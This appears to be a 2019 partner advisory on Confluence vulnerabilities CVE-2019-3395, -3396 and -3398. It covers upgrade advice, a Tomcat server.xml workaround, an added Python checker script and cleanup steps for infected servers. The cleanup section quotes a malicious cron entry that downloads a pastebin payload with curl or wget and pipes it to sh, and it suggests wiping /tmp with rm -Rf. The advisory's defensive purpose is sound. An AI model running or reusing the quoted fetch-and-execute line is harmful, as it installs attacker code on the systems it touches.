Thu, 04/18/2019 - 07:38
Example Screenshot

In March, Atlassian announced that the knowledge base/document collaboration tool Confluence (Server and Data Center) contained two critical vulnerabilities, in the WebDAV and Widget Connector apps. On April 17th another critical security vulnerability was found in Confluence. Unfortunately, over the past few days we and many other Solution Partners have become aware that this vulnerability is being actively exploited by attackers against publicly reachable Confluence instances. To protect yourself from such attacks, Atlassian recommends upgrading to the latest Confluence versions.

In the following we provide more detailed information about the effects of these security vulnerabilities, what they can cause, and how to recover from this kind of attack.


About the Security vulnerabilities

WebDAV vulnerability - CVE-2019-3395

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center versions released before the 18th June 2018 are vulnerable to this issue. A remote attacker is able to exploit a Server-Side Request Forgery (SSRF) vulnerability in the WebDAV plugin to send arbitrary HTTP and WebDAV requests from a Confluence Server or Data Center instance.

All versions of Confluence Server and Confluence Data Center before version 6.6.7, from version 6.7.0 before 6.8.5 (the fixed version for 6.8.x), and from version 6.9.0 before 6.9.3 (the fixed version for 6.9.x) are affected by this vulnerability.

Widget Connector vulnerability - CVE-2019-3396

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

There was a server-side template injection vulnerability in the Widget Connector of Confluence Server and Data Center. An attacker is able to exploit this issue to achieve server-side template injection, path traversal and remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server and Confluence Data Center before version 6.6.12, from version 6.7.0 before 6.12.3 (the fixed version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x) are affected by this vulnerability.

Path traversal in the downloadallattachments resource - CVE-2019-3398

Severity

Atlassian rates the severity level of this vulnerability as critical, according to the scale published in our Atlassian severity levels. The scale allows us to rank the severity as critical, high, moderate or low.

This is our assessment and you should evaluate its applicability to your own IT environment.

Description

Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and/or blogs, or to create a new space or personal space, or who has 'Admin' permissions for a space, can exploit this path traversal vulnerability to write files to arbitrary locations, which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.

All versions of Confluence Server from 2.0.0 before 6.6.13 (the fixed version for 6.6.x), from 6.7.0 before 6.12.4 (the fixed version for 6.12.x), from 6.13.0 before 6.13.4 (the fixed version for 6.13.x), from 6.14.0 before 6.14.3 (the fixed version for 6.14.x), and from 6.15.0 before 6.15.2 are affected by this vulnerability.

More Details

Secure your instance!

First of all: please make sure to upgrade your Confluence instance to the latest version! This is the best way to protect yourself from this kind of attack.

If you are on an Enterprise release of Confluence, you only need to install the latest minor update for that release. If you are not on an Enterprise release and are not on one of the last two versions, you will have to upgrade to the latest version.

If this is not possible due to other reasons, you need to secure your instance ASAP. Here is how to proceed:

Mitigation for CVE-2019-3396

If you are unable to upgrade Confluence immediately, as a temporary workaround go to Settings > Manage apps / add-ons, select System, and disable the following system plugins in Confluence:

If you disable the Widget Connector plugin, the Widget Connector macro will not be available anymore. This macro is used to display content from websites like YouTube, Vimeo, and Twitter. Users will see an 'unknown macro' error.

If you disable the WebDAV plugin, you will not be able to connect to Confluence using a WebDAV client. Disabling this plugin will also automatically disable the Office Connector plugin, which means Office Connector features such as "Import from Word" and "Edit in Office" are no longer available. Note that WebDAV is not required for editing files in Confluence 6.11 and later, so editing files remains possible in those versions.

After upgrading, you will need to manually re-enable:

  • WebDAV plugin
  • Widget Connector
  • Office Connector.


Mitigation for CVE-2019-3398

If you are unable to upgrade Confluence immediately, as a temporary workaround you should block the affected URL <base-url>/<context-path>/pages/downloadallattachments.action. Disabling this URL will prevent anyone from downloading all attachments via the attachments page or the attachments macro. Downloading individual attachments will continue to work.

To block the URL directly in Tomcat:

  1. Stop Confluence.
  2. Edit <install-directory>/conf/server.xml.
  3. Add the following inside the <Host> element:

    <Context path="/pages/downloadallattachments.action" docBase="">
      <Valve className="org.apache.catalina.valves.RemoteAddrValve" deny="*" />
    </Context>

    If you run Confluence with a context path, for example /wiki, you will need to include your context path in the path, as shown here:

    <Context path="/wiki/pages/downloadallattachments.action" docBase="">
      <Valve className="org.apache.catalina.valves.RemoteAddrValve" deny="*" />
    </Context>

  4. Save the file, and restart Confluence.

To verify that the workaround was applied correctly:

  1. Navigate to a page or blog that has 2 or more attachments.
  2. Go to > Attachments and then select Download all attachments.

You should see a 404 error and no files should be downloaded.
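As an added example (not from the original post or from Atlassian), a Python check that parses a server.xml and confirms the blocking Context is in place under a Host, including the context-path mismatch from step 3 (a Context for /pages/... does nothing when Confluence is served under /wiki). The server.xml fragments are constructed samples.

```python
import xml.etree.ElementTree as ET

ACTION = "/pages/downloadallattachments.action"
VALVE = "org.apache.catalina.valves.RemoteAddrValve"


def workaround_applied(server_xml, context_path=""):
    """Return (ok, reason) for the CVE-2019-3398 Tomcat workaround.

    The <Context> must be a direct child of a <Host>, its path must be the
    Confluence context path (e.g. "/wiki", or "" when none) followed by the
    action, and it must contain a RemoteAddrValve that denies every client.
    """
    expected = context_path.rstrip("/") + ACTION
    root = ET.fromstring(server_xml)
    for host in root.iter("Host"):
        for ctx in host.findall("Context"):
            path = ctx.get("path", "")
            if not path.endswith(ACTION):
                continue  # unrelated Context, e.g. the Confluence webapp itself
            if path != expected:
                return False, "path %r does not match expected %r" % (path, expected)
            valves = [v for v in ctx.findall("Valve") if v.get("className") == VALVE]
            if not valves:
                return False, "no RemoteAddrValve inside the Context"
            if any(v.get("deny") == "*" for v in valves):
                return True, "ok"
            return False, "RemoteAddrValve does not deny '*'"
    return False, "no Context for the action under any <Host>"


# Constructed server.xml fragments (not taken from a real installation).
def sample(path, valve):
    return (
        '<Server><Service><Engine><Host name="localhost" appBase="webapps">'
        '<Context path="%s" docBase="">%s</Context>'
        "</Host></Engine></Service></Server>" % (path, valve)
    )


DENY_ALL = '<Valve className="%s" deny="*" />' % VALVE
NO_CONTEXT_PATH = sample(ACTION, DENY_ALL)           # Confluence served at /
WITH_WIKI_PATH = sample("/wiki" + ACTION, DENY_ALL)  # Confluence served at /wiki
MISSING_VALVE = sample(ACTION, "")

if __name__ == "__main__":
    print(workaround_applied(NO_CONTEXT_PATH))          # (True, 'ok')
    print(workaround_applied(NO_CONTEXT_PATH, "/wiki"))  # path mismatch
    print(workaround_applied(MISSING_VALVE))             # missing valve
```

Run it against your real file with `workaround_applied(open("conf/server.xml").read(), "/wiki")` before restarting, then still do the 404 check above, since a mistyped className is only caught at runtime.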


Already infected?

We are currently aware of the following effects caused by exploiting the security vulnerabilities:

  1. The instance is unreachable
  2. Unable to start the instance → process will be killed after a few seconds
  3. Heavy CPU load from processes run by the Confluence user under unusual names such as sshd, khugepaged or vmlinuz

Example of htop

If your instance shows these or similar symptoms, you may also have been attacked and exploited by this malware. So far we have observed this type of attack on Linux systems only. Several files are created in the /tmp folder; one of them, /tmp/seasame, is the malware itself. The malware then attempts to install itself as a service, register a cronjob and run itself. This description is based on our current analyses; there may be other variants exploiting these vulnerabilities.

How to resolve this issue if you are affected?

The following steps are a workaround. The recommended fix is to install a new server and copy over only the database and the Confluence-data folder. If this is currently not possible, try the following:

  1. Kill the processes
  2. Clean /tmp folder e.g. rm -Rf /tmp/*
  3. (Optional) Delete the Confluence user (this prevents the malware from being executed)
  4. Check cronjobs for the malware (In addition you might want to check for a modified noop.jsp)

    There might be an entry like this:

    ```*/15 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi%7C%7Cwget -q -O- https://pastebin.com/raw/wR3ETdbi)|sh```

  5. Install the latest version of Confluence
  6. (Optional) If the Confluence user was deleted in step 3, create a new one with a different name.


Please feel free to contact venITure, if you have any questions regarding this issue or if you need any type of technical support in this matter. (service@venITure.net or +49 221 985 9240)
